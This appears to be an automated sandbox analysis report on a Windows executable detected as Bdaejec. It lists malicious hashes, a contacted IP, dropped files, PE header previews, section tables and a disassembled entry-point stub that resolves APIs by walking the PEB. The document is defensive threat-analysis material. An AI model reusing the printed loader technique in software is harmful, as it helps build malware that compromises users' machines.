      94846EDFED07F0DFFAB570F7C0E746E0077012FA5854B6B610552A8CA5A48F74.exeGet hashmaliciousBdaejec, RedLineBrowse
      • 44.221.84.105
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      AMAZON-AESUS942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exeGet hashmaliciousBdaejecBrowse
      • 44.221.84.105
      998D503AA5E68830D7F981490108D44DC12F331BD5AD9EA9F207A99E6D06AFBB.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
      • 44.221.84.105
      95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exeGet hashmaliciousBdaejecBrowse
      • 44.221.84.105
      987123[1].exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
      • 44.221.84.105
      96ee8edc[1].exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
      • 44.221.84.105
      962EA3E84B772C84BC0D9495CC00BF547CA80AC1ED34026CB971B6F5EB9DEEC8.exeGet hashmaliciousBdaejec, Oski Stealer, VidarBrowse
      • 44.221.84.105
      942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exeGet hashmaliciousBdaejec, SalityBrowse
      • 44.221.84.105
      Transaction record 5445-97660.pdfGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
      • 3.227.160.36
      95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exeGet hashmaliciousBdaejecBrowse
      • 44.221.84.105
      94846EDFED07F0DFFAB570F7C0E746E0077012FA5854B6B610552A8CA5A48F74.exeGet hashmaliciousBdaejec, RedLineBrowse
      • 44.221.84.105
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      C:\Users\user\AppData\Local\Temp\TJytnf.exe#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeGet hashmaliciousBdaejec, SalityBrowse
        a4#Uff09.exeGet hashmaliciousBdaejec, SalityBrowse
          1.0.0.2.exeGet hashmaliciousBdaejec, SalityBrowse
            log1.exeGet hashmaliciousBabadeda, Bdaejec, NeshtaBrowse
              log2.exeGet hashmaliciousBabadeda, Bdaejec, NeshtaBrowse
                2.exeGet hashmaliciousBdaejecBrowse
                  gracNYJFpD.exeGet hashmaliciousBdaejec, GhostRat, Nitol, Young LotusBrowse
                    xpKZwKFN9W.exeGet hashmaliciousBdaejecBrowse
                      LVF7FM9Z4I.exeGet hashmaliciousBdaejecBrowse
                        hJSrJRHret.exeGet hashmaliciousBdaejecBrowse
                          Process:C:\Users\user\AppData\Local\Temp\TJytnf.exe
                          File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19456
                          Entropy (8bit):6.590817003365994
                          Encrypted:false
                          SSDEEP:384:1F7SJXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:uHQGPL4vzZq2o9W7GsxBbPr
                          MD5:04FB7D6753629A411CC2A2E1ECB89FE3
                          SHA1:AB8A44A8C160FC6332E2892ACC69E74AA5F7B2D3
                          SHA-256:3BA20C131FD09D7BC928EDF02BBE0C6EDCE60EF40C91F45B83BDBFA0CA30B153
                          SHA-512:ADBD9188B36590FD9566D4B6EDA1EDC1C2040C27110B38A0FE82A17028D3A3F4B70AEA56E48223C50E5BA6698AABCFA36B8683C004BC16755A4605FAB083E258
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Reputation:low
                          Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                          Process:C:\Users\user\AppData\Local\Temp\TJytnf.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:modified
                          Size (bytes):2389504
                          Entropy (8bit):6.731347675473881
                          Encrypted:false
                          SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                          MD5:403B5F575F5C3808C09487855ABA6CA4
                          SHA1:A2D2C1B5050C78575336D584F525AD18BDAA4D05
                          SHA-256:AB07285A9E2C26B2C32A55C22997FEA287248FC089D5AF36CB8BE9577ACDCAAB
                          SHA-512:485423AA4FF73682DC5463F83401D2C0701565AF744CD6EF4DF4CCA641AF230AA35B96DFBF208466139DF4E95ECF987F4BAB14385C6F8C2AF0C3830A33D16638
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\TJytnf.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):31744
                          Entropy (8bit):6.366523037669518
                          Encrypted:false
                          SSDEEP:768:uWQ3655Kv1X/qY1MSdfRQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdfWGCq2iW7z
                          MD5:BFA62DE85D5E1B317284A73C9241D3AF
                          SHA1:277043F150EB2408AE00028FE84D045C71AB3252
                          SHA-256:57EA921BD33B9EF82D67D675C07FDC646BF56563FCDF6FB06C3158F29DD21734
                          SHA-512:556BD8F3CF6F36F6717743658A89BCC24657447CB7C2B0F3C6DD1076C39C1C2AE958D3B133750500018EF336FC29116A9193FEBC571E3C6104E94F285F0A8F65
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.9734450409891874
                          Encrypted:false
                          SSDEEP:96:qOgFqKmwsmhnc7afzQXIDcQwc6XcEdcw34+HbHg/5ksS/Yy+U6QHAmR/xSaOygH2:LgKwi0OT3VjU/JXzuiFCZ24IO89
                          MD5:0A849BFEDE2B317ABC0F923C69794225
                          SHA1:9302A921158DB68CE312078267E80AD13AB2ACA5
                          SHA-256:E0612B482DE8CB5D260974543E0BD8D42AE71FFC18A41BC6EB2146125EF3A660
                          SHA-512:0F911971865356A0A9DBC736E3A741F5D35E22D322437C77E1C83F27DD0F74730FF990CA243311F800593DAF38D1FB072F6F82F0F6A1AB0A3A9ED0FC34EE36CD
                          Malicious:false
                          Reputation:low
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.2.6.1.5.9.6.1.9.8.6.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.2.6.1.6.0.6.5.1.0.9.5.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.1.c.3.c.a.d.-.1.e.9.6.-.4.1.9.4.-.9.7.6.8.-.b.e.c.e.3.9.7.3.7.f.c.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.9.7.6.4.c.5.-.1.8.7.4.-.4.3.a.0.-.9.4.7.d.-.7.f.5.3.5.7.3.0.e.9.d.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.T.J.y.t.n.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.b.c.-.0.0.0.1.-.0.0.1.4.-.3.a.c.e.-.3.5.3.7.0.7.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.b.0.d.5.c.4.5.b.d.c.5.1.c.b.0.5.a.f.e.e.1.8.2.0.9.f.4.8.8.2.5.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.T.J.y.t.n.f...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Wed Jul 24 20:22:40 2024, 0x1205a4 type
                          Category:dropped
                          Size (bytes):158444
                          Entropy (8bit):1.824947946222564
                          Encrypted:false
                          SSDEEP:384:2L0cBAbsJ995WUqGyTrHDJVQL9RDyB9agibAB9MHi:iBBxJ99P5yTrHDJQ9wratas
                          MD5:8C7208A7B0F4859DB9BE581EE48A66A7
                          SHA1:172B16D9D4185DC63AAE7BE0CE580246EE11E8CC
                          SHA-256:2BEBAB3550708D5C429D6EC11417EEFDACDA3D2B7CD703F3B1775F36CE94C9AA
                          SHA-512:929BEDC364ABC7F90A5DF12B87BA8E5680C7FC6FDA531F8F17C4DB8372049CA3ED7469516B472B81A2F67B268D2D89F1B703E7AC2F42F0312A07E98252563166
                          Malicious:false
                          Reputation:low
                          Preview:MDMP..a..... ........b.f............D...............X.......<...$ ......$....M..........`.......8...........T............=..$-..........` ..........L"..............................................................................eJ......."......GenuineIntel............T............b.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8270
                          Entropy (8bit):3.699597134214299
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJ196O6Y+yl06ygmfmgpDM89bpKsfNjm:R6lXJP6O6Yi6ygmfmUppfU
                          MD5:F106CF4DC5AE2A039897B3F1C9C5D4D6
                          SHA1:CB4A8C059A50916903EF2D1CBA4231E7D19B68F3
                          SHA-256:11D2E23705FADC350F637F24F192359DB4284F9864175654F5FA467C85BEBA94
                          SHA-512:9DBE0A98138D7B202C9581B7C28ACD4939EE4C5E1FA41A37D0C7E8DCD14266A4CCAFF694D49933723CB3C02A40EE03E6D15E653B72C0BED053A8C64435BCA0F7
                          Malicious:false
                          Reputation:low
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.5.6.<./.P.i.
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4551
                          Entropy (8bit):4.442991333738184
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zsqJg77aI9wLWpW8VYzYm8M4JYgFMM+q8qVbPM2gDsRd:uIjf4I7u67VLJUM9bxgYRd
                          MD5:C7CBFE72E8A3F065C7777E67013B2582
                          SHA1:81B82CDD5CA02F1832B9ED9F98AEB04D215C7F8E
                          SHA-256:64355F784DC0E195F4819532152484604A73B1C8E91B40084DDB924EF4313769
                          SHA-512:F038166C13AF062D2C5F1978444EDCF970DF0B681EB0C84AF8E0739751DC9A945CC7E9E26376D907A461D0C4E6B932E2A6CE13B1F6B8125DDF0E28FD0012F23D
                          Malicious:false
                          Reputation:low
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425485" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                          Process:C:\Users\user\AppData\Local\Temp\TJytnf.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):4
                          Entropy (8bit):1.5
                          Encrypted:false
                          SSDEEP:3:Nv:9
                          MD5:D3B07384D113EDEC49EAA6238AD5FF00
                          SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                          SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                          SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:foo.
                          Process:C:\Users\user\AppData\Local\Temp\TJytnf.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):4
                          Entropy (8bit):1.5
                          Encrypted:false
                          SSDEEP:3:Nv:9
                          MD5:D3B07384D113EDEC49EAA6238AD5FF00
                          SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                          SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                          SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:foo.
                          Process:C:\Users\user\Desktop\biKy3nZEyJ.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):15872
                          Entropy (8bit):7.031113762428177
                          Encrypted:false
                          SSDEEP:384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
                          MD5:56B2C3810DBA2E939A8BB9FA36D3CF96
                          SHA1:99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
                          SHA-256:4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
                          SHA-512:27812A9A034D7BD2CA73B337AE9E0B6DC79C38CFD1A2C6AC9D125D3CC8FA563C401A40D22155811D5054E5BAA8CF8C8E7E03925F25FA856A9BA9DEA708D15B4E
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Joe Sandbox View:
                          • Filename: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, Detection: malicious, Browse
                          • Filename: a4#Uff09.exe, Detection: malicious, Browse
                          • Filename: 1.0.0.2.exe, Detection: malicious, Browse
                          • Filename: log1.exe, Detection: malicious, Browse
                          • Filename: log2.exe, Detection: malicious, Browse
                          • Filename: 2.exe, Detection: malicious, Browse
                          • Filename: gracNYJFpD.exe, Detection: malicious, Browse
                          • Filename: xpKZwKFN9W.exe, Detection: malicious, Browse
                          • Filename: LVF7FM9Z4I.exe, Detection: malicious, Browse
                          • Filename: hJSrJRHret.exe, Detection: malicious, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.I.>.'.>.'.>.'..7\.2.'...(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\TJytnf.exe
                          File Type:MS Windows registry file, NT/2000 or above
                          Category:dropped
                          Size (bytes):1835008
                          Entropy (8bit):4.465999342206427
                          Encrypted:false
                          SSDEEP:6144:CIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNVdwBCswSbn:nXD94+WlLZMM6YFHf+n
                          MD5:EBA342DCC676383AACC181B2B12EDC19
                          SHA1:44B00D6226F46E5BAF415D9BE2C06781D3C5C346
                          SHA-256:7E0505ED3A2C7BFA5334426B3F0FF7F49AEC2B7E48CA55C2BE017FE9A733D004
                          SHA-512:FA1ABF1CF21F83DD9F4995CB1B00C1D049D334BB754C470405644E7086DE187F68CC5A77D243000FA63812871E3D2D00805DDABF05F0D1C786729324ADF59D0E
                          Malicious:false
                          Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.f.7...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):6.46807306180755
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 98.81%
                          • Windows ActiveX control (116523/4) 1.15%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:biKy3nZEyJ.exe
                          File size:3'101'704 bytes
                          MD5:6963bb0311ded02ba57657ba4a61d427
                          SHA1:777ed3376f2b380fef0658e6b1ab4a90e4dca901
                          SHA256:98dc44e47b06318ebd73414912cd60f5ff71b3fe172476d353b4dda39c7dc327
                          SHA512:62f7cea98e3d9855333934fad2b5d3d2681109d3e095022b444e6eba284e33dba1502f050cc95adbcbe475bff8fccf2e64b59110504c4f8b23441079bfd90e06
                          SSDEEP:49152:WbJ8ShfSifOsD+Q/Hg1Pi+zrEREFo8IEoypFfbVquZLlrlB6ezwA1UCKG+mipmAQ:0haIO2+Q/A1lzrqYo8I2TVquZLF8Cimr
                          TLSH:60E590237AF1847AC6630332897D7779A1EDEA701936E283679C1F2D1D701D35A386A3
                          File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......4...p...p...p....e0.q...}...$...}. ._...}.......6...1...p...i....e1.}....e/.r....e4.S...p...{...s...u...}.$.q...p.h.q...s.!.q..
                          Icon Hash:03d4c69ec892d0cc
                          Entrypoint:0x740000
                          Entrypoint Section:A#uq
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                          Time Stamp:0x547CD530 [Mon Dec 1 20:53:04 2014 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:0
                          File Version Major:6
                          File Version Minor:0
                          Subsystem Version Major:6
                          Subsystem Version Minor:0
                          Import Hash:fc8b72cd3830d0f6a9c801b4385e1454
                          Instruction
                          push ebp
                          mov ebp, esp
                          sub esp, 0000016Ch
                          xor eax, eax
                          push ebx
                          push esi
                          push edi
                          mov dword ptr [ebp-24h], eax
                          mov dword ptr [ebp-10h], eax
                          mov dword ptr [ebp-14h], eax
                          mov dword ptr [ebp-08h], eax
                          mov dword ptr [ebp-0Ch], eax
                          mov dword ptr [ebp-20h], eax
                          mov dword ptr [ebp-18h], eax
                          mov dword ptr [ebp-48h], 74794A54h
                          mov dword ptr [ebp-44h], 652E666Eh
                          mov dword ptr [ebp-40h], 00006578h
                          mov dword ptr [ebp-3Ch], 00000000h
                          call 00007F21252B2AF5h
                          pop eax
                          add eax, 00000225h
                          mov dword ptr [ebp-04h], eax
                          mov eax, dword ptr fs:[00000030h]
                          mov dword ptr [ebp-28h], eax
                          mov eax, dword ptr [ebp-04h]
                          mov dword ptr [eax], E904C483h
                          mov eax, dword ptr [ebp-04h]
                          mov dword ptr [eax+04h], FFEC74CCh
                          mov eax, dword ptr [ebp-28h]
                          mov eax, dword ptr [eax+0Ch]
                          mov eax, dword ptr [eax+1Ch]
                          mov eax, dword ptr [eax]
                          mov eax, dword ptr [eax+08h]
                          mov ecx, dword ptr [eax+3Ch]
                          mov ecx, dword ptr [ecx+eax+78h]
                          add ecx, eax
                          mov edi, dword ptr [ecx+1Ch]
                          mov ebx, dword ptr [ecx+20h]
                          mov esi, dword ptr [ecx+24h]
                          mov ecx, dword ptr [ecx+18h]
                          add esi, eax
                          add edi, eax
                          add ebx, eax
                          xor edx, edx
                          mov dword ptr [ebp-30h], esi
                          mov dword ptr [ebp-1Ch], edx
                          mov dword ptr [ebp-34h], ecx
                          cmp edx, dword ptr [ebp-34h]
                          jnc 00007F21252B2C3Eh
                          movzx ecx, word ptr [esi+edx*2]
                          mov edx, dword ptr [ebx+edx*4]
                          mov esi, dword ptr [edi+ecx*4]
                          add edx, eax
                          mov ecx, dword ptr [edx]
                          add esi, eax
                          cmp ecx, 4D746547h
                          jne 00007F21252B2B44h
                          cmp dword ptr [edx+04h], 6C75646Fh
                          jne 00007F21252B2B3Bh
                          Programming Language:
                          • [C++] VS2013 build 21005
                          • [ASM] VS2013 build 21005
                          • [ C ] VS2013 build 21005
                          • [C++] VS2013 UPD3 build 30723
                          • [RES] VS2013 build 21005
                          • [LNK] VS2013 UPD3 build 30723
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x2d58a40x168.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x33b0000x4810.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x25cf700x38.rdata
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2a4f600x40.rdata
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x25c0000xc70.rdata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x25941a0x2596006d614c1b6c91e57cc6f893e8d5353b4bunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          CONST0x25b0000x500x2009d2c259028ec9a2bead2fdb719de93b6False0.171875data1.4183627461897457IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rdata0x25c0000x7dad20x7dc00d165cf31a244df646478cfc7b91b27cfFalse0.3152025347912525data5.278930315697064IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0x2da0000x60c900x15000306075b28383012b063734f6e211a392False0.23208472842261904data3.7836579408963225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0x33b0000x48100x4a00cab02b81ece1759cd51a94aca6929323False0.27322635135135137data4.038463935393645IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          A#uq0x3400000x50000x4200e0c06908751f6768e214a43c990d414cFalse0.7772845643939394data6.934503720718857IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_CURSOR0x33baa80x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4805194805194805
                          RT_CURSOR0x33bbdc0xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"EnglishUnited States0.7
                          RT_CURSOR0x33bc900x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.36363636363636365
                          RT_CURSOR0x33bdc40x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.35714285714285715
                          RT_CURSOR0x33bef80x134dataEnglishUnited States0.37337662337662336
                          RT_CURSOR0x33c02c0x134dataEnglishUnited States0.37662337662337664
                          RT_CURSOR0x33c1600x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                          RT_CURSOR0x33c2940x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.37662337662337664
                          RT_CURSOR0x33c3c80x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                          RT_CURSOR0x33c4fc0x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                          RT_CURSOR0x33c6300x134dataEnglishUnited States0.44155844155844154
                          RT_CURSOR0x33c7640x134dataEnglishUnited States0.4155844155844156
                          RT_CURSOR0x33c8980x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.5422077922077922
                          RT_CURSOR0x33c9cc0x134dataEnglishUnited States0.2662337662337662
                          RT_CURSOR0x33cb000x134dataEnglishUnited States0.2824675324675325
                          RT_CURSOR0x33cc340x134dataEnglishUnited States0.3246753246753247
                          RT_BITMAP0x33cd680xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80EnglishUnited States0.44565217391304346
                          RT_BITMAP0x33ce200x144Device independent bitmap graphic, 33 x 11 x 4, image size 220EnglishUnited States0.37962962962962965
                          RT_ICON0x33cf640x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.24059139784946237
                          RT_DIALOG0x33d24c0xe8dataEnglishUnited States0.6336206896551724
                          RT_DIALOG0x33d3340x34dataEnglishUnited States0.9038461538461539
